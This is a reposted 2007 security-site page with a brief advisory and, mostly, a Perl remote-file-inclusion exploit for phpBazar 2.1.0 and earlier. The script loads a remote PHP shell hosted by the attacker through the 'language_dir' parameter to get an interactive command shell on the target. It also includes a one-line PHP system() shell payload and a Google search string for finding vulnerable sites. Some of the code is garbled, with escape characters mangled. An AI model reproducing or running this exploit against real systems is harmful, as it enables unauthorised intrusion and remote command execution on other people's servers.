phpBazar File Inclusion (Exploit)

| 网站首页 | 模板 | 资料 | 源码 | 工具 | 开发 | 设计 | 安全 | 项目 | 网络 | 图片 | 系统 | 数据库 | 博客 | 会员中心 | 小说 |

网络学院

学习资料

源码模版

您现在的位置：精品下载 >> 安全 >> 网络安全 >> 安全中心正文

用户登录

新用户注册

phpBazar File Inclusion (Exploit)

【字体：小大】

phpBazar File Inclusion (Exploit)

作者：佚名安全中心来源：不详点击数：更新时间：2007-10-10

Summary
"phpBazar is a PHP/mySQL Classified Ads & Matchmaking."

Improper handling of user input allows attackers to upload arbitrary files using phpBazar.

Credit:
The information has been provided by mescalin underground.　

Details
Vulnerable Systems:
* phpBazar version 2.1.0 and prior

Exploit:
#!/usr/bin/perl
##
# phpBazar <= 2.1.0 Remote File Inclusion Exploit
# by mescalin
# mescalin_ at msn.com | http://mescalin.100free.com
# Google Search=inurl:classified.php phpbazar
#
# usage:
#
# perl phpbazar-210.pl <target> <cmd shell location> <cmd shell variable>
#
# example: if host: http://sitebug.com/dir1/classified.php is vulnerable then
# USE: phpbazar-210.pl http://sitebug.com/dir1/ http://www.site.com.br/shell.txt cmd
#
# cmd shell example: <?system($cmd);?>
# cmd shell variable: ($_GET[cmd]);
##
##
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:///// || $Pathtocmd!~/http:///// || !$cmdv)
head();
while()
{
　　 print "[shell] /$";
while(<STDIN>)
　　 {
　　　　　　 $cmd=$_;
　　　　　　 chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'classified_right.php?language_dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "/nCould Not connect/n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[/n]/[ ]/;
if (!$cmd) {print "/nPlease Enter a Command/n/n"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
　　 {print "/nCould Not Connect to cmd Host or Invalid Command Variable/n";exit}
elsif ($return =~/^<br.//>.<b>Fatal.error/) {print "/nInvalid Command or No Return/n/n"}
if($return =~ /(.*)/)
{
　　 $finreturn = $1;
　　 $finreturn=~ tr/[ ]/[/n]/;
　　 print "/r/n$finreturn/n/r";
　　 last;
}
else {print "[shell] /$";}}}last;
sub head()
{
print "/n============================================================================/r/n";
print " phpBazar <= 2.1.0 Remote File Inclusion Exploit | 24/05/06 /r/n";
print "============================================================================/r/n";
print " > by mescalin /r/n";
print " > mescalin_ at msn.com - http://mescalin.100free.com /r/n";
}
sub usage()
{
head();
print " /r/n";
print " Usage: perl phpbazar-210.pl <target> <cmd shell location> <cmd shell variable>/r/n/n";
print " <target> - Full path to classified.php /r/n";

print " (ex: http://sitebug.com/dir1/classified.php ----> http://sitebug.com/dir1/) /r/n";
print " /r/n";
print " <cmd shell> - Path to cmd Shell ex http://mescalin.v10.com.br/shell.txt /r/n";
print " <cmd variable> - Command variable used in php shell /r/n";
print " /r/n";

exit();
}

#EoF

安全中心录入：chqnet 责任编辑：chqnet

上一个安全中心： netPanzer Server DoS (Exploit)

下一个安全中心： RealVNC Authentication Bypass Scanner

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关安全中心
				Macromedia Flash Player SW… HP-UX Kernel本地拒绝服务漏… HP-UX Software Distributor… HP-UX Kernel本地拒绝服务漏… HP-UX Swagentd远程拒绝服务… HP-UX usermod工具本地非授权… Moodle moodle.php远程文件包… SiteDepth CMS constants.ph… MyPHP CMS global_header.ph… Invision Power Board index…

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）